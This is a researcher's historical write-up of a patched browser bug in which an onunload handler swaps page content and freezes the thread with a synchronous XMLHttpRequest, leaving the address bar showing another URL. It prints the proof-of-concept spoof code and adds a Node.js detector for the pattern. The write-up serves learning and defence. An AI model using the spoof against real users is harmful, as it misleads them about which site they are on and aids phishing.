I found that an onunload handler could replace the page’s content and then freeze the browser thread using a synchronous XMLHttpRequest to a never-responding server endpoint. This left the address bar showing the URL the user was navigating to while the visible page content had been replaced by attacker-controlled HTML — a combined content and address bar spoof.

window.onunload = function()
{
    document.body.innerHTML = "<h1>The content of this window has been spoofed!</h1> Check out the address-bar.";
    oXML = new XMLHttpRequest();
    oXML.open("GET", "sleep.aspx", false); // sleep.aspx never finishes its response.
    oXML.send(null); // Here the thread gets frozen, with the incorrect URL in the address-bar.
}

When the user typed a new URL in the address bar and pressed Enter, the onunload event fired, replaced the page body, and then issued a synchronous XHR to an endpoint that never sent a response. The thread froze: the address bar showed the destination URL the user typed, but the page displayed the spoofed content. More sophisticated variants could use postMessage or htmlFile ActiveX to interact with the frozen page.
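As an added example (not part of the original write-up), here is a heuristic Node.js check for reviewing page source for the pattern described above: a synchronous XMLHttpRequest (third `open()` argument `false`) issued inside a page-dismissal handler. The function names and the sample input are constructed for illustration, and the check relies on regexes and brace matching rather than a full JavaScript parser.

```javascript
// Added example: heuristic review aid, not a full JavaScript parser.
// Flags XMLHttpRequest.open(..., false) inside unload/beforeunload/pagehide handlers.
const DISMISSAL = new RegExp(
  "\\bon(?:before)?unload\\s*=\\s*function\\b[^{]*\\{" +
  "|addEventListener\\(\\s*[\"'](?:unload|beforeunload|pagehide)[\"']\\s*,\\s*function\\b[^{]*\\{", "g");
const SYNC_OPEN = /\.open\(\s*["'][A-Za-z]+["']\s*,[^)]*?,\s*false\s*\)/;

// Return the handler body starting at the "{" at index `open`,
// skipping braces that sit inside string literals or // comments.
function handlerBody(src, open) {
  let depth = 0, quote = null;
  for (let i = open; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === "\\") i++;                     // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === "`") quote = c;
    else if (c === "/" && src[i + 1] === "/") {
      const nl = src.indexOf("\n", i);
      i = nl === -1 ? src.length : nl;         // jump to end of the comment
    } else if (c === "{") depth++;
    else if (c === "}" && --depth === 0) return src.slice(open, i + 1);
  }
  return src.slice(open);                      // unbalanced input: scan to the end
}

function findSyncXhrInDismissal(src) {
  const findings = [];
  for (const m of src.matchAll(DISMISSAL)) {
    const open = m.index + m[0].length - 1;    // index of the handler's "{"
    const hit = SYNC_OPEN.exec(handlerBody(src, open));
    if (!hit) continue;
    const handler = m[0].match(/beforeunload|unload|pagehide/)[0];
    const line = src.slice(0, open + hit.index).split("\n").length;
    findings.push({ handler, line });
  }
  return findings;
}

// Constructed sample: the first handler follows the pattern above, the second is benign.
const SAMPLE = [
  'window.onunload = function()',
  '{',
  '    document.body.innerHTML = "<h1>spoofed</h1>";',
  '    var oXML = new XMLHttpRequest();',
  '    oXML.open("GET", "sleep.aspx", false); // blocks the thread',
  '    oXML.send(null);',
  '}',
  'window.addEventListener("pagehide", function () { navigator.sendBeacon("/log", "bye"); });',
].join("\n");
console.log(findSyncXhrInDismissal(SAMPLE));
```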

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.